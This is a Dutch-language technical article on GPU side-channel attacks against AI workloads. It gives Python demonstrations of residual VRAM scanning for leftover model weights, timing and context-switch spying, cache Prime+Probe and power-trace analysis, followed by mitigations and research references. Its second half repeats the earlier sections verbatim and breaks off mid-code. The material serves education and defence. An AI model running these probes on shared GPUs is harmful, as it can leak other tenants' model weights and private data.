GPU-geheugen side-channelaanvallen

Expert14 min lezenBijgewerkt op 2026-03-20

Side-channelaanvallen die GPU-geheugentoewijzing, timing en elektromagnetische emanatie uitbuiten om gevoelige data te onttrekken aan AI-workloads.

infrastructure gpu side-channel privacy hardware

Overzicht

GPU's zijn ontworpen voor parallelle berekening, niet voor multi-tenant security-isolatie. Anders dan CPU's, die decennia aan verfijning in geheugenbescherming kennen (virtueel geheugen, paginatabellen, protection rings), is GPU-geheugenbeheer fundamenteel eenvoudiger. NVIDIA-GPU's gebruiken een verenigde VRAM-pool die wordt beheerd door de CUDA-driver, en de isolatiegaranties hangen af van de sharing-modus (exclusive, time-sliced, MPS of MIG).

Dit creëert side-channelmogelijkheden die op CPU's niet bestaan. Wanneer GPU-geheugen wordt toegewezen en vrijgegeven, blijft de data in VRAM staan tot het wordt overschreven. Wanneer meerdere workloads een GPU delen, lekken timingverschillen in geheugenoperaties informatie over andere workloads. Zelfs fysieke side-channels — stroomverbruik en elektromagnetische emanatie — dragen informatie over de berekeningen die op de GPU worden uitgevoerd.

Deze side-channels zijn rechtstreeks relevant voor AI-security omdat AI-workloads gevoelige data verwerken: modelgewichten (intellectueel eigendom), inference-invoer (gebruikersdata, zakelijke queries) en trainingsdata (die PII, medische dossiers of financiële gegevens kan bevatten). Dit artikel behandelt de bekende GPU-side-channelaanvalsklassen, biedt praktische demonstratiecode en evalueert de effectiviteit van beschikbare mitigaties.

De hier beschreven aanvallen putten uit onderzoek waaronder Naghibijouybari et al., "Rendered Insecure: GPU Side Channel Attacks are Practical" (IEEE S&P 2018), en Wei et al., "Leaky DNN: Stealing Deep-learning Model Secret with GPU Context-Switching Side-Channel" (IEEE DSN 2020).

GPU-geheugenarchitectuur

VRAM-beheer

NVIDIA-GPU's beheren VRAM via de CUDA-driver, die geheugen in blokken toewijst. Anders dan virtueel CPU-geheugen initialiseert GPU-geheugentoewijzing standaard niet in alle contexten op nul. De cudaMalloc van de CUDA-runtime garandeert niet dat toegewezen geheugen wordt gewist, wat betekent dat nieuw toegewezen buffers data van eerdere toewijzingen kunnen bevatten.

import torch
import numpy as np
from typing import Dict, List, Optional, Tuple
 
class GPUMemoryResidualScanner:
    """
    Scan GPU memory for residual data from previous workloads.
    Demonstrates the GPU memory residual side channel.
    """
 
    def __init__(self, device: str = "cuda:0"):
        self.device = torch.device(device)
        if not torch.cuda.is_available():
            raise RuntimeError("CUDA is not available")
 
    def allocate_and_scan(
        self,
        size_mb: int = 256,
        num_blocks: int = 10,
    ) -> List[Dict]:
        """
        Allocate GPU memory blocks and check for non-zero residual data.
 
        This demonstrates that GPU memory may contain data from previous
        allocations by other processes on the same GPU.
        """
        findings = []
 
        for i in range(num_blocks):
            # Allocate without initialization
            num_elements = (size_mb * 1024 * 1024) // 4  # float32 = 4 bytes
            try:
                # Use empty (not zeros) to avoid initialization
                tensor = torch.empty(num_elements, dtype=torch.float32, device=self.device)
 
                # Check for non-zero values (residual data)
                non_zero_count = torch.count_nonzero(tensor).item()
                non_zero_ratio = non_zero_count / num_elements
 
                # Statistical analysis of residual data
                if non_zero_count > 0:
                    non_zero_values = tensor[tensor != 0]
                    findings.append({
                        "block": i,
                        "size_mb": size_mb,
                        "non_zero_count": non_zero_count,
                        "non_zero_ratio": non_zero_ratio,
                        "sample_values": non_zero_values[:10].cpu().tolist(),
                        "min_value": non_zero_values.min().item(),
                        "max_value": non_zero_values.max().item(),
                        "finding": "RESIDUAL_DATA_FOUND",
                    })
                else:
                    findings.append({
                        "block": i,
                        "size_mb": size_mb,
                        "non_zero_count": 0,
                        "finding": "CLEAN",
                    })
 
                del tensor
                torch.cuda.empty_cache()
 
            except torch.cuda.OutOfMemoryError:
                findings.append({
                    "block": i,
                    "finding": "OOM — could not allocate",
                })
 
        return findings
 
    def scan_for_model_weights(
        self, size_mb: int = 512
    ) -> Dict:
        """
        Attempt to detect residual model weight patterns in GPU memory.
        Model weights typically follow specific statistical distributions
        (approximately normal for transformer layers).
        """
        num_elements = (size_mb * 1024 * 1024) // 4
        tensor = torch.empty(num_elements, dtype=torch.float32, device=self.device)
 
        non_zero = tensor[tensor != 0]
        if len(non_zero) == 0:
            return {"found": False, "detail": "No residual data"}
 
        # Check if the distribution looks like model weights
        mean = non_zero.mean().item()
        std = non_zero.std().item()
        kurtosis_val = ((non_zero - mean) ** 4).mean().item() / (std ** 4) - 3
 
        looks_like_weights = (
            abs(mean) < 0.5  # Weights are typically near zero
            and 0.001 < std < 1.0  # Reasonable weight scale
            and abs(kurtosis_val) < 10  # Not too heavy-tailed
        )
 
        del tensor
        torch.cuda.empty_cache()
 
        return {
            "found": looks_like_weights,
            "statistics": {
                "mean": mean,
                "std": std,
                "kurtosis": kurtosis_val,
                "sample_size": len(non_zero),
            },
            "interpretation": (
                "Residual data matches typical model weight distribution"
                if looks_like_weights
                else "Residual data does not match weight patterns"
            ),
        }

Geheugentoewijzingstiming

De tijd die nodig is om GPU-geheugen toe te wijzen hangt af van de huidige geheugentoestand, die wordt beïnvloed door andere workloads. Door de toewijzingstiming te meten kan een aanvaller informatie afleiden over co-residente workloads:

import torch
import time
from typing import List, Dict
 
class GPUTimingSideChannel:
    """
    Demonstrate GPU memory timing side channels.
    Allocation and computation timing varies based on co-resident workloads.
    """
 
    def __init__(self, device: str = "cuda:0"):
        self.device = torch.device(device)
 
    def measure_allocation_timing(
        self,
        sizes_mb: List[int] = None,
        num_samples: int = 100,
    ) -> List[Dict]:
        """
        Measure GPU memory allocation timing at various sizes.
        Timing variations can reveal co-resident workload activity.
        """
        if sizes_mb is None:
            sizes_mb = [1, 10, 50, 100, 500]
 
        results = []
        for size_mb in sizes_mb:
            num_elements = (size_mb * 1024 * 1024) // 4
            timings = []
 
            for _ in range(num_samples):
                torch.cuda.synchronize()
                start = time.perf_counter_ns()
 
                try:
                    t = torch.empty(num_elements, dtype=torch.float32, device=self.device)
                    torch.cuda.synchronize()
                    elapsed_ns = time.perf_counter_ns() - start
                    timings.append(elapsed_ns)
                    del t
                    torch.cuda.empty_cache()
                except torch.cuda.OutOfMemoryError:
                    break
 
            if timings:
                results.append({
                    "size_mb": size_mb,
                    "mean_ns": sum(timings) / len(timings),
                    "min_ns": min(timings),
                    "max_ns": max(timings),
                    "std_ns": (
                        sum((t - sum(timings)/len(timings))**2 for t in timings) / len(timings)
                    ) ** 0.5,
                    "samples": len(timings),
                })
 
        return results
 
    def measure_inference_timing(
        self,
        model: torch.nn.Module,
        input_sizes: List[Tuple[int, ...]],
        num_samples: int = 50,
    ) -> List[Dict]:
        """
        Measure inference timing across different input sizes.
        Timing reveals information about model architecture.
        """
        model.eval()
        results = []
 
        for input_size in input_sizes:
            timings = []
 
            for _ in range(num_samples):
                x = torch.randn(*input_size, device=self.device)
 
                # Warm up
                with torch.no_grad():
                    _ = model(x)
                torch.cuda.synchronize()
 
                # Measure
                start = time.perf_counter_ns()
                with torch.no_grad():
                    _ = model(x)
                torch.cuda.synchronize()
                elapsed_ns = time.perf_counter_ns() - start
 
                timings.append(elapsed_ns)
                del x
 
            results.append({
                "input_size": input_size,
                "mean_us": sum(timings) / len(timings) / 1000,
                "std_us": (
                    sum((t - sum(timings)/len(timings))**2 for t in timings) / len(timings)
                ) ** 0.5 / 1000,
                "samples": len(timings),
            })
 
        return results

Context-switching-side-channels

Wanneer meerdere processen een GPU delen via time-slicing (de standaard op consumenten-GPU's en veel cloud-instances), wisselt de GPU van context tussen processen. Elke contextwissel veroorzaakt meetbare prestatie-interferentie.

Wei et al. toonden in "Leaky DNN: Stealing Deep-learning Model Secret with GPU Context-Switching Side-Channel" (IEEE DSN 2020) aan dat een aanvaller, door een spy-proces te draaien dat zijn eigen prestaties tijdens contextwissels monitort, het volgende kan afleiden:

Of er een neuraal netwerk draait op de gedeelde GPU
De modelarchitectuur (aantal lagen, laagtypen)
De eigenschappen van de invoerdata (afbeeldingsdimensies, batchgrootte)

import torch
import time
from typing import Dict, List
 
class ContextSwitchSpy:
    """
    Monitor GPU context switching to infer co-resident workload properties.
    Based on concepts from Wei et al. (IEEE DSN 2020).
    """
 
    def __init__(self, device: str = "cuda:0"):
        self.device = torch.device(device)
 
    def run_spy_kernel(
        self,
        duration_seconds: float = 5.0,
        probe_size: int = 1024,
    ) -> List[Dict]:
        """
        Run a continuous probe kernel and measure timing variations.
        Timing spikes indicate GPU context switches to other workloads.
        """
        probe = torch.randn(probe_size, probe_size, device=self.device)
        measurements = []
        start_time = time.perf_counter()
 
        while time.perf_counter() - start_time < duration_seconds:
            torch.cuda.synchronize()
            op_start = time.perf_counter_ns()
 
            # Simple matrix multiply as timing probe
            result = torch.mm(probe, probe)
            torch.cuda.synchronize()
 
            op_end = time.perf_counter_ns()
            elapsed_ns = op_end - op_start
 
            measurements.append({
                "timestamp_ns": op_start,
                "duration_ns": elapsed_ns,
            })
 
            del result
 
        # Analyze timing variations
        durations = [m["duration_ns"] for m in measurements]
        mean_duration = sum(durations) / len(durations)
        threshold = mean_duration * 2  # Context switch causes >2x slowdown
 
        context_switches = [
            m for m in measurements if m["duration_ns"] > threshold
        ]
 
        return {
            "total_probes": len(measurements),
            "mean_duration_ns": mean_duration,
            "context_switches_detected": len(context_switches),
            "switch_ratio": len(context_switches) / len(measurements) if measurements else 0,
            "interpretation": (
                "Co-resident GPU workload detected"
                if len(context_switches) > len(measurements) * 0.05
                else "No significant co-resident activity detected"
            ),
        }
 
    def infer_layer_structure(
        self,
        measurements: List[Dict],
        expected_layer_duration_us: float = 100,
    ) -> Dict:
        """
        Attempt to infer neural network layer structure from timing patterns.
        Different layer types (conv, attention, linear) have characteristic timing signatures.
        """
        # Group context switch gaps into clusters that may correspond to layers
        durations = [m["duration_ns"] for m in measurements]
        mean_d = sum(durations) / len(durations)
 
        # Find timing pattern periodicity
        anomalies = []
        for i, d in enumerate(durations):
            if d > mean_d * 1.5:
                anomalies.append(i)
 
        if len(anomalies) < 2:
            return {"inference_possible": False, "reason": "Insufficient anomaly data"}
 
        # Calculate intervals between anomalies
        intervals = [
            anomalies[i+1] - anomalies[i]
            for i in range(len(anomalies) - 1)
        ]
 
        # Look for periodicity (suggesting repeated layer execution)
        if intervals:
            mean_interval = sum(intervals) / len(intervals)
            interval_std = (
                sum((i - mean_interval)**2 for i in intervals) / len(intervals)
            ) ** 0.5
 
            periodic = interval_std / mean_interval < 0.3 if mean_interval > 0 else False
 
            return {
                "inference_possible": True,
                "anomaly_count": len(anomalies),
                "mean_interval": mean_interval,
                "periodic": periodic,
                "estimated_layers": len(anomalies) if periodic else "unknown",
                "interpretation": (
                    f"Detected periodic pattern suggesting ~{len(anomalies)} layer executions"
                    if periodic
                    else "Detected activity but could not determine layer structure"
                ),
            }
 
        return {"inference_possible": False, "reason": "No clear pattern"}

Cache-gebaseerde side-channels

GPU-cachecontentie

Moderne GPU's hebben L1- en L2-caches. In gedeelde GPU-omgevingen creëert cachecontentie tussen workloads waarneembare timingverschillen:

import torch
import time
from typing import Dict, List
 
class GPUCacheSideChannel:
    """
    Demonstrate GPU cache-based side channels.
    Cache contention from co-resident workloads causes measurable timing variations.
    """
 
    def __init__(self, device: str = "cuda:0"):
        self.device = torch.device(device)
 
    def prime_and_probe(
        self,
        array_size: int = 4 * 1024 * 1024,  # 4M elements ~= 16MB at float32
        num_rounds: int = 100,
    ) -> Dict:
        """
        GPU adaptation of Prime+Probe cache side channel.
 
        1. Prime: Fill GPU cache with known data
        2. Wait: Allow victim to execute (displacing some cache lines)
        3. Probe: Measure access time to our cached data
 
        Cache lines displaced by the victim will be slower to access.
        """
        # Create a large array that fills the L2 cache
        probe_array = torch.randn(array_size, dtype=torch.float32, device=self.device)
        access_pattern = torch.randperm(array_size, device=self.device)[:1024]
 
        baseline_times = []
        probe_times = []
 
        for round_idx in range(num_rounds):
            # PRIME: Access all elements to fill cache
            torch.cuda.synchronize()
            _ = probe_array.sum()
            torch.cuda.synchronize()
 
            # PROBE (baseline — no victim activity between prime and probe)
            start = time.perf_counter_ns()
            _ = probe_array[access_pattern].sum()
            torch.cuda.synchronize()
            baseline_time = time.perf_counter_ns() - start
            baseline_times.append(baseline_time)
 
            # PRIME again
            _ = probe_array.sum()
            torch.cuda.synchronize()
 
            # Small delay to allow potential co-resident activity
            time.sleep(0.001)
 
            # PROBE again (after potential victim activity)
            start = time.perf_counter_ns()
            _ = probe_array[access_pattern].sum()
            torch.cuda.synchronize()
            probe_time = time.perf_counter_ns() - start
            probe_times.append(probe_time)
 
        mean_baseline = sum(baseline_times) / len(baseline_times)
        mean_probe = sum(probe_times) / len(probe_times)
 
        return {
            "rounds": num_rounds,
            "mean_baseline_ns": mean_baseline,
            "mean_probe_ns": mean_probe,
            "timing_difference_ns": mean_probe - mean_baseline,
            "cache_contention_detected": mean_probe > mean_baseline * 1.2,
            "contention_ratio": mean_probe / mean_baseline if mean_baseline > 0 else 0,
        }

Stroom- en elektromagnetische side-channels

GPU-stroomverbruik correleert met rekenkundige activiteit. Onderzoek heeft aangetoond dat stroomtraces het volgende kunnen onthullen:

Of de GPU matrixvermenigvuldiging uitvoert (training/inference) versus geheugenoperaties
De grootte van de matrices die worden berekend
Mogelijk de waarden die worden verwerkt (in extreme gevallen met hoge-resolutiemetingen)

Deze aanvallen vereisen fysieke toegang tot stroommeetpunten of elektromagnetische probes nabij de GPU, waardoor ze vooral relevant zijn voor:

Gedeelde fysieke infrastructuur (colocatie-datacenters)
Edge-AI-apparaten waar een aanvaller fysieke toegang heeft
Supply-chain-aanvallen waarbij monitoringhardware is geïmplanteerd

from typing import Dict, List, Optional
from dataclasses import dataclass
 
@dataclass
class PowerMeasurement:
    """Simulated GPU power measurement data point."""
    timestamp_us: float
    power_watts: float
    gpu_utilization_pct: float
 
class PowerSideChannelAnalyzer:
    """
    Analyze GPU power consumption traces for information leakage.
 
    In practice, power measurements come from:
    - nvidia-smi (low resolution, ~1 second)
    - NVML API (higher resolution, ~100ms)
    - External power meters (highest resolution)
    """
 
    def analyze_power_trace(
        self,
        measurements: List[PowerMeasurement],
    ) -> Dict:
        """Analyze a power consumption trace for patterns."""
        if not measurements:
            return {"analysis": "no_data"}
 
        powers = [m.power_watts for m in measurements]
        timestamps = [m.timestamp_us for m in measurements]
 
        # Detect computation phases
        mean_power = sum(powers) / len(powers)
        phases = []
        current_phase = "idle" if powers[0] < mean_power else "active"
        phase_start = 0
 
        for i in range(1, len(powers)):
            new_phase = "idle" if powers[i] < mean_power * 0.8 else "active"
            if new_phase != current_phase:
                phases.append({
                    "type": current_phase,
                    "start_idx": phase_start,
                    "end_idx": i,
                    "duration_us": timestamps[i] - timestamps[phase_start],
                    "mean_power": sum(powers[phase_start:i]) / (i - phase_start),
                })
                current_phase = new_phase
                phase_start = i
 
        active_phases = [p for p in phases if p["type"] == "active"]
 
        return {
            "total_measurements": len(measurements),
            "mean_power_watts": mean_power,
            "max_power_watts": max(powers),
            "min_power_watts": min(powers),
            "computation_phases": len(active_phases),
            "phase_details": active_phases[:10],
            "interpretation": (
                f"Detected {len(active_phases)} computation phases — "
                "may correspond to model layers or inference batches"
            ),
        }
 
    def detect_model_architecture_from_power(
        self, phases: List[Dict]
    ) -> Dict:
        """
        Attempt to infer model architecture from power consumption patterns.
        Different layer types have characteristic power signatures.
        """
        if len(phases) < 3:
            return {"inference_possible": False}
 
        # Attention layers: high power, longer duration
        # Linear layers: moderate power, shorter duration
        # Normalization: low power, very short duration
        layer_classifications = []
        for phase in phases:
            power = phase.get("mean_power", 0)
            duration = phase.get("duration_us", 0)
 
            if power > 250 and duration > 1000:
                layer_classifications.append("attention_or_matmul")
            elif power > 150 and duration > 500:
                layer_classifications.append("linear")
            elif duration < 200:
                layer_classifications.append("normalization_or_activation")
            else:
                layer_classifications.append("unknown")
 
        return {
            "inference_possible": True,
            "estimated_layers": len(layer_classifications),
            "layer_types": layer_classifications,
            "attention_layers": layer_classifications.count("attention_or_matmul"),
            "linear_layers": layer_classifications.count("linear"),
        }

Mitigaties

Softwarematige mitigaties

import torch
from typing import Optional
 
class GPUSideChannelMitigation:
    """Software mitigations for GPU side-channel attacks."""
 
    @staticmethod
    def secure_allocate(
        size: tuple,
        dtype: torch.dtype = torch.float32,
        device: str = "cuda:0",
    ) -> torch.Tensor:
        """Allocate GPU memory and zero-initialize it to prevent residual data leakage."""
        tensor = torch.zeros(size, dtype=dtype, device=torch.device(device))
        return tensor
 
    @staticmethod
    def secure_deallocate(tensor: torch.Tensor) -> None:
        """Securely deallocate a tensor by overwriting with zeros before freeing."""
        if tensor.is_cuda:
            tensor.zero_()
            torch.cuda.synchronize()
        del tensor
        torch.cuda.empty_cache()
 
    @staticmethod
    def add_timing_noise(
        min_delay_ms: float = 0.1,
        max_delay_ms: float = 1.0,
    ) -> None:
        """
        Add random timing noise to inference operations.
        Makes timing side channels less reliable.
        """
        import random
        delay = random.uniform(min_delay_ms, max_delay_ms) / 1000
        time.sleep(delay)
 
    @staticmethod
    def constant_time_inference(
        model: torch.nn.Module,
        input_tensor: torch.Tensor,
        fixed_duration_ms: float = 100,
    ) -> torch.Tensor:
        """
        Execute inference and pad to a fixed duration.
        Prevents timing side channels by making all inferences take the same time.
        """
        start = time.perf_counter()
 
        with torch.no_grad():
            output = model(input_tensor)
        torch.cuda.synchronize()
 
        elapsed_ms = (time.perf_counter() - start) * 1000
        remaining_ms = fixed_duration_ms - elapsed_ms
        if remaining_ms > 0:
            time.sleep(remaining_ms / 1000)
 
        return output

Hardwarematige mitigaties

Mitigatie	Effectiviteit	Prestatie-impact	Beschikbaarheid
MIG (Multi-Instance GPU)	Hoog — hardware-isolatie	Vermindert reken per instance	A100, H100
NVIDIA Confidential Computing	Zeer hoog — versleuteld GPU-geheugen	5-15% overhead	H100
GPU-geheugenscrubbing	Gemiddeld — verwijdert residuen	Voegt toewijzingslatentie toe	Softwarematig configureerbaar
Aparte GPU per workload	Volledig — geen sharing	Duur	Elke GPU
IOMMU	Gemiddeld — voorkomt DMA-aanvallen	Minimaal	Afhankelijk van CPU/chipset

Defensieve aanbevelingen

Gebruik MIG voor multi-tenant GPU-omgevingen om hardware-afgedwongen geheugenisolatie te bereiken
Initialiseer GPU-geheugen op nul bij toewijzing om residu-datalekkage te voorkomen
Vul GPU-geheugen met nullen voordat je gevoelige tensors vrijgeeft
Gebruik NVIDIA Confidential Computing (H100) voor gevoelige inference-workloads
Vermijd GPU-time-slicing voor security-gevoelige workloads — gebruik dedicated GPU's of MIG-instances
Voeg timing-ruis toe aan inference-operaties om timing-side-channels te verslaan
Monitor GPU-stroomverbruik op afwijkende patronen die op een side-channelaanval kunnen wijzen
Schakel IOMMU in om DMA-gebaseerde geheugentoegang vanuit gecompromitteerde GPU-workloads te voorkomen

Referenties

Naghibijouybari et al. — "Rendered Insecure: GPU Side Channel Attacks are Practical" (IEEE S&P 2018) — foundational GPU side channel research
Wei et al. — "Leaky DNN: Stealing Deep-learning Model Secret with GPU Context-Switching Side-Channel" (IEEE DSN 2020) — model architecture inference from context switching
Zhu et al. — "Hermes Attack: Steal DNN Models with Lossless Inference Accuracy" (USENIX Security 2021) — model extraction via GPU side channels
NVIDIA Multi-Instance GPU — https://docs.nvidia.com/datacenter/tesla/mig-user-guide/
NVIDIA Confidential Computing — https://developer.nvidia.com/confidential-computing
MITRE ATLAS — AML.T0024 (Exfiltration via ML Inference API)

GPU-geheugen side-channelaanvallen

Expert14 min lezenBijgewerkt op 2026-03-20

Side-channelaanvallen die GPU-geheugentoewijzing, timing en elektromagnetische emanatie uitbuiten om gevoelige data te onttrekken aan AI-workloads.

infrastructure gpu side-channel privacy hardware

Overzicht

GPU-geheugenarchitectuur

VRAM-beheer

import torch
import numpy as np
from typing import Dict, List, Optional, Tuple
 
class GPUMemoryResidualScanner:
    """
    Scan GPU memory for residual data from previous workloads.
    Demonstrates the GPU memory residual side channel.
    """
 
    def __init__(self, device: str = "cuda:0"):
        self.device = torch.device(device)
        if not torch.cuda.is_available():
            raise RuntimeError("CUDA is not available")
 
    def allocate_and_scan(
        self,
        size_mb: int = 256,
        num_blocks: int = 10,
    ) -> List[Dict]:
        """
        Allocate GPU memory blocks and check for non-zero residual data.
 
        This demonstrates that GPU memory may contain data from previous
        allocations by other processes on the same GPU.
        """
        findings = []
 
        for i in range(num_blocks):
            # Allocate without initialization
            num_elements = (size_mb * 1024 * 1024) // 4  # float32 = 4 bytes
            try:
                # Use empty (not zeros) to avoid initialization
                tensor = torch.empty(num_elements, dtype=torch.float32, device=self.device)
 
                # Check for non-zero values (residual data)
                non_zero_count = torch.count_nonzero(tensor).item()
                non_zero_ratio = non_zero_count / num_elements
 
                # Statistical analysis of residual data
                if non_zero_count > 0:
                    non_zero_values = tensor[tensor != 0]
                    findings.append({
                        "block": i,
                        "size_mb": size_mb,
                        "non_zero_count": non_zero_count,
                        "non_zero_ratio": non_zero_ratio,
                        "sample_values": non_zero_values[:10].cpu().tolist(),
                        "min_value": non_zero_values.min().item(),
                        "max_value": non_zero_values.max().item(),
                        "finding": "RESIDUAL_DATA_FOUND",
                    })
                else:
                    findings.append({
                        "block": i,
                        "size_mb": size_mb,
                        "non_zero_count": 0,
                        "finding": "CLEAN",
                    })
 
                del tensor
                torch.cuda.empty_cache()
 
            except torch.cuda.OutOfMemoryError:
                findings.append({
                    "block": i,
                    "finding": "OOM — could not allocate",
                })
 
        return findings
 
    def scan_for_model_weights(
        self, size_mb: int = 512
    ) -> Dict:
        """
        Attempt to detect residual model weight patterns in GPU memory.
        Model weights typically follow specific statistical distributions
        (approximately normal for transformer layers).
        """
        num_elements = (size_mb * 1024 * 1024) // 4
        tensor = torch.empty(num_elements, dtype=torch.float32, device=self.device)
 
        non_zero = tensor[tensor != 0]
        if len(non_zero) == 0:
            return {"found": False, "detail": "No residual data"}
 
        # Check if the distribution looks like model weights
        mean = non_zero.mean().item()
        std = non_zero.std().item()
        kurtosis_val = ((non_zero - mean) ** 4).mean().item() / (std ** 4) - 3
 
        looks_like_weights = (
            abs(mean) < 0.5  # Weights are typically near zero
            and 0.001 < std < 1.0  # Reasonable weight scale
            and abs(kurtosis_val) < 10  # Not too heavy-tailed
        )
 
        del tensor
        torch.cuda.empty_cache()
 
        return {
            "found": looks_like_weights,
            "statistics": {
                "mean": mean,
                "std": std,
                "kurtosis": kurtosis_val,
                "sample_size": len(non_zero),
            },
            "interpretation": (
                "Residual data matches typical model weight distribution"
                if looks_like_weights
                else "Residual data does not match weight patterns"
            ),
        }

Geheugentoewijzingstiming

import torch
import time
from typing import List, Dict
 
class GPUTimingSideChannel:
    """
    Demonstrate GPU memory timing side channels.
    Allocation and computation timing varies based on co-resident workloads.
    """
 
    def __init__(self, device: str = "cuda:0"):
        self.device = torch.device(device)
 
    def measure_allocation_timing(
        self,
        sizes_mb: List[int] = None,
        num_samples: int = 100,
    ) -> List[Dict]:
        """
        Measure GPU memory allocation timing at various sizes.
        Timing variations can reveal co-resident workload activity.
        """
        if sizes_mb is None:
            sizes_mb = [1, 10, 50, 100, 500]
 
        results = []
        for size_mb in sizes_mb:
            num_elements = (size_mb * 1024 * 1024) // 4
            timings = []
 
            for _ in range(num_samples):
                torch.cuda.synchronize()
                start = time.perf_counter_ns()
 
                try:
                    t = torch.empty(num_elements, dtype=torch.float32, device=self.device)
                    torch.cuda.synchronize()
                    elapsed_ns = time.perf_counter_ns() - start
                    timings.append(elapsed_ns)
                    del t
                    torch.cuda.empty_cache()
                except torch.cuda.OutOfMemoryError:
                    break
 
            if timings:
                results.append({
                    "size_mb": size_mb,
                    "mean_ns": sum(timings) / len(timings),
                    "min_ns": min(timings),
                    "max_ns": max(timings),
                    "std_ns": (
                        sum((t - sum(timings)/len(timings))**2 for t in timings) / len(timings)
                    ) ** 0.5,
                    "samples": len(timings),
                })
 
        return results
 
    def measure_inference_timing(
        self,
        model: torch.nn.Module,
        input_sizes: List[Tuple[int, ...]],
        num_samples: int = 50,
    ) -> List[Dict]:
        """
        Measure inference timing across different input sizes.
        Timing reveals information about model architecture.
        """
        model.eval()
        results = []
 
        for input_size in input_sizes:
            timings = []
 
            for _ in range(num_samples):
                x = torch.randn(*input_size, device=self.device)
 
                # Warm up
                with torch.no_grad():
                    _ = model(x)
                torch.cuda.synchronize()
 
                # Measure
                start = time.perf_counter_ns()
                with torch.no_grad():
                    _ = model(x)
                torch.cuda.synchronize()
                elapsed_ns = time.perf_counter_ns() - start
 
                timings.append(elapsed_ns)
                del x
 
            results.append({
                "input_size": input_size,
                "mean_us": sum(timings) / len(timings) / 1000,
                "std_us": (
                    sum((t - sum(timings)/len(timings))**2 for t in timings) / len(timings)
                ) ** 0.5 / 1000,
                "samples": len(timings),
            })
 
        return results

Context-switching-side-channels

Of er een neuraal netwerk draait op de gedeelde GPU
De modelarchitectuur (aantal lagen, laagtypen)
De eigenschappen van de invoerdata (afbeeldingsdimensies, batchgrootte)

import torch
import time
from typing import Dict, List
 
class ContextSwitchSpy:
    """
    Monitor GPU context switching to infer co-resident workload properties.
    Based on concepts from Wei et al. (IEEE DSN 2020).
    """
 
    def __init__(self, device: str = "cuda:0"):
        self.device = torch.device(device)
 
    def run_spy_kernel(
        self,
        duration_seconds: float = 5.0,
        probe_size: int = 1024,
    ) -> List[Dict]:
        """
        Run a continuous probe kernel and measure timing variations.
        Timing spikes indicate GPU context switches to other workloads.
        """
        probe = torch.randn(probe_size, probe_size, device=self.device)
        measurements = []
        start_time = time.perf_counter()
 
        while time.perf_counter() - start_time < duration_seconds:
            torch.cuda.synchronize()
            op_start = time.perf_counter_ns()
 
            # Simple matrix multiply as timing probe
            result = torch.mm(probe, probe)
            torch.cuda.synchronize()
 
            op_end = time.perf_counter_ns()
            elapsed_ns = op_end - op_start
 
            measurements.append({
                "timestamp_ns": op_start,
                "duration_ns": elapsed_ns,
            })
 
            del result
 
        # Analyze timing variations
        durations = [m["duration_ns"] for m in measurements]
        mean_duration = sum(durations) / len(durations)
        threshold = mean_duration * 2  # Context switch causes >2x slowdown
 
        context_switches = [
            m for m in measurements if m["duration_ns"] > threshold
        ]
 
        return {
            "total_probes": len(measurements),
            "mean_duration_ns": mean_duration,
            "context_switches_detected": len(context_switches),
            "switch_ratio": len(context_switches) / len(measurements) if measurements else 0,
            "interpretation": (
                "Co-resident GPU workload detected"
                if len(context_switches) > len(measurements) * 0.05
                else "No significant co-resident activity detected"
            ),
        }
 
    def infer_layer_structure(
        self,
        measurements: List[Dict],
        expected_layer_duration_us: float = 100,
    ) -> Dict:
        """
        Attempt to infer neural network layer structure from timing patterns.
        Different layer types (conv, attention, linear) have characteristic timing signatures.
        """
        # Group context switch gaps into clusters that may correspond to layers
        durations = [m["duration_ns"] for m in measurements]
        mean_d = sum(durations) / len(durations)
 
        # Find timing pattern periodicity
        anomalies = []
        for i, d in enumerate(durations):
            if d > mean_d * 1.5:
                anomalies.append(i)
 
        if len(anomalies) < 2:
            return {"inference_possible": False, "reason": "Insufficient anomaly data"}
 
        # Calculate intervals between anomalies
        intervals = [
            anomalies[i+1] - anomalies[i]
            for i in range(len(anomalies) - 1)
        ]
 
        # Look for periodicity (suggesting repeated layer execution)
        if intervals:
            mean_interval = sum(intervals) / len(intervals)
            interval_std = (
                sum((i - mean_interval)**2 for i in intervals) / len(intervals)
            ) ** 0.5
 
            periodic = interval_std / mean_interval < 0.3 if mean_interval > 0 else False
 
            return {
                "inference_possible": True,
                "anomaly_count": len(anomalies),
                "mean_interval": mean_interval,
                "periodic": periodic,
                "estimated_layers": len(anomalies) if periodic else "unknown",
                "interpretation": (
                    f"Detected periodic pattern suggesting ~{len(anomalies)} layer executions"
                    if periodic
                    else "Detected activity but could not determine layer structure"
                ),
            }
 
        return {"inference_possible": False, "reason": "No clear pattern"}

Cache-gebaseerde side-channels

GPU-cachecontentie

Moderne GPU's hebben L1- en L2-caches. In gedeelde GPU-omgevingen creëert cachecontentie tussen workloads waarneembare timingverschillen:

import torch
import time
from typing import Dict, List
 
class GPUCacheSideChannel:
    """
    Demonstrate GPU cache-based side channels.
    Cache contention from co-resident workloads causes measurable timing variations.
    """
 
    def __init__(self, device: str = "cuda:0"):
        self.device = torch.device(device)
 
    def prime_and_probe(
        self,
        array_size: int = 4 * 1024 * 1024,  # 4M elements ~= 16MB at float32
        num_rounds: int = 100,
    ) -> Dict:
        """
        GPU adaptation of Prime+Probe cache side channel.
 
        1. Prime: Fill GPU cache with known data
        2. Wait: Allow victim to execute (displacing some cache lines)
        3. Probe: Measure access time to our cached data
 
        Cache lines displaced by the victim will be slower to access.
        """
        # Create a large array that fills the L2 cache
        probe_array = torch.randn(array_size, dtype=torch.float32, device=self.device)
        access_pattern = torch.randperm(array_size, device=self.device)[:1024]
 
        baseline_times = []
        probe_times = []
 
        for round_idx in range(num_rounds):
            # PRIME: Access all elements to fill cache
            torch.cuda.synchronize()
            _ = probe_array.sum()
            torch.cuda.synchronize()
 
            # PROBE (baseline — no victim activity between prime and probe)
            start = time.perf_counter_ns()
            _ = probe_array[access_pattern].sum()
            torch.cuda.synchronize()
            baseline_time = time.perf_counter_ns() - start
            baseline_times.append(baseline_time)
 
            # PRIME again
            _ = probe_array.sum()
            torch.cuda.synchronize()
 
            # Small delay to allow potential co-resident activity
            time.sleep(0.001)
 
            # PROBE again (after potential victim activity)
            start = time.perf_counter_ns()
            _ = probe_array[access_pattern].sum()
            torch.cuda.synchronize()
            probe_time = time.perf_counter_ns() - start
            probe_times.append(probe_time)
 
        mean_baseline = sum(baseline_times) / len(baseline_times)
        mean_probe = sum(probe_times) / len(probe_times)
 
        return {
            "rounds": num_rounds,
            "mean_baseline_ns": mean_baseline,
            "mean_probe_ns": mean_probe,
            "timing_difference_ns": mean_probe - mean_baseline,
